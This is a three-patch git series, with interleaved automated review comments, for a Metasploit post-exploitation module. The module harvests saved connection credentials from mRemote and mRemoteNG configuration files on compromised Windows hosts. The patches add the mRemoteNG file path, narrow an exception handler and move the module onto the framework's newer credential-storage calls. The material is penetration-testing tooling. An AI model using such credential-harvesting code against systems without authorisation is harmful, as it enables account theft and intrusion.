From bf3bb63e4ac498d1958cf670d9fddc9263b79e65 Mon Sep 17 00:00:00 2001
From: David Maloney
Date: Thu, 29 May 2014 15:43:02 -0500
Subject: [PATCH 1/3] fix mremote to work on mremoteNG fixed the mremote credential post module to work against the newer mRemoteNG
---
 modules/post/windows/gather/credentials/mremote.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb
index bf73a554b8..508770168b 100644
--- a/modules/post/windows/gather/credentials/mremote.rb
+++ b/modules/post/windows/gather/credentials/mremote.rb
@@ -41,8 +41,10 @@ class Metasploit3 < Msf::Post
 grab_user_profiles().each do |user|
 next if user['LocalAppData'] == nil
- tmpath= user['LocalAppData'] + '\\Felix_Deimel\\mRemote\\confCons.xml'
+ tmpath = user['LocalAppData'] + '\\Felix_Deimel\\mRemote\\confCons.xml'
+ ng_path = user['LocalAppData'] + '\\..\\Roaming\\mRemoteNG\\confCons.xml'
 get_xml(tmpath)
+ get_xml(ng_path)
 end
 end
From a1131092b7c28887c2bff7863986f5a6eb8d7e78 Mon Sep 17 00:00:00 2001
From: David Maloney
Date: Thu, 29 May 2014 16:05:16 -0500
Subject: [PATCH 2/3] fix open rescue rescuing all exceptions bad bad past dave bad
---
 modules/post/windows/gather/credentials/mremote.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb
index 508770168b..bdbc0f78b6 100644
--- a/modules/post/windows/gather/credentials/mremote.rb
+++ b/modules/post/windows/gather/credentials/mremote.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Post
 end
 parse_xml(condata)
 print_status("Finished processing #{path}")
- rescue
+ rescue Rex::Post::Meterpreter::RequestError
 print_status("The file #{path} either could not be read or does not exist")
 end
From e012d55d736ad85230e5a40749a08e8df14bb428 Mon Sep 17 00:00:00 2001
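Review bot: The added `ng_path` line reaches the roaming profile by appending `\\..\\Roaming` to `user['LocalAppData']`, so it depends on the relative layout of the two profile directories and is still gated only by the `LocalAppData` nil check above it. If the hash returned by `grab_user_profiles` carries the roaming directory (the framework's profile helper normally exposes it as `'AppData'`; confirm), `ng_path = user['AppData'] + '\\mRemoteNG\\confCons.xml'` with its own nil guard states the intent directly. Whichever form is kept, a one-line comment such as `# mRemoteNG keeps confCons.xml under the roaming profile` would explain why two paths are tried. The enclosing method starts and ends outside the hunk.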
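Review bot: With the clause narrowed to `rescue Rex::Post::Meterpreter::RequestError`, anything `parse_xml(condata)` raises in the same block is no longer handled here, so a single malformed confCons.xml would propagate to the caller and, unless the caller rescues (it is outside the hunk), stop the run before the remaining profiles are processed. A second clause for the parser's error class with its own message would keep the two failure modes apart, for example `rescue REXML::ParseException => e` followed by `print_error("Could not parse #{path}: #{e.message}")`, assuming `parse_xml` is REXML-based, which this hunk does not show. The read-failure branch still reports through `print_status`; `print_error` or a verbose-only message fits better now that two paths are probed per user. The method's signature and `begin` are outside the hunk.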
From: David Maloney
Date: Thu, 29 May 2014 16:27:41 -0500
Subject: [PATCH 3/3] refactor mremote mremote post module now refactored to use new metasploit credentials
---
 .../windows/gather/credentials/mremote.rb | 46 +++++++++++++++----
 1 file changed, 38 insertions(+), 8 deletions(-)
diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb
index bdbc0f78b6..1c55f8912e 100644
--- a/modules/post/windows/gather/credentials/mremote.rb
+++ b/modules/post/windows/gather/credentials/mremote.rb
@@ -86,14 +86,44 @@ class Metasploit3 < Msf::Post
 else
 source_id = nil
 end
- report_auth_info(
- :host => host,
- :port => port,
- :sname => proto,
- :source_id => source_id,
- :source_type => "exploit",
- :user => user,
- :pass => pass)
+
+ service_data = {
+ address: host,
+ port: port,
+ service_name: proto,
+ protocol: 'tcp',
+ workspace_id: myworkspace_id
+ }
+
+ credential_data = {
+ origin_type: :session,
+ session_id: session_db_id,
+ post_reference_name: self.refname,
+ private_type: :password,
+ private_data: pass,
+ username: user
+ }
+
+ unless domain.blank?
+ credential_data[:realm_key] = Metasploit::Credential::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+ credential_data[:realm_value] = domain
+ end
+
+ credential_data.merge!(service_data)
+
+ # Create the Metasploit::Credential::Core object
+ credential_core = create_credential(credential_data)
+
+ # Assemble the options hash for creating the Metasploit::Credential::Login object
+ login_data ={
+ core: credential_core,
+ status: Metasploit::Credential::Login::Status::UNTRIED
+ }
+
+ # Merge in the service data and create our Login
+ login_data.merge!(service_data)
+ login = create_credential_login(login_data)
+
 end
 end
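Review bot: The conditional that ends in the leading context lines (`source_id = nil`) appears to have fed only the removed `report_auth_info` call, so `source_id` is now dead and that `if/else` can be dropped; its start is outside the hunk. `login = create_credential_login(login_data)` likewise assigns a local that is never read and can be the bare call `create_credential_login(login_data)`. `domain` is tested in `unless domain.blank?` but is not assigned anywhere in this hunk, so confirm it is set earlier in the method; if it is not, that line raises NameError on the first record. Minor style: `login_data ={` should read `login_data = {`, and `self.refname` can be plain `refname`.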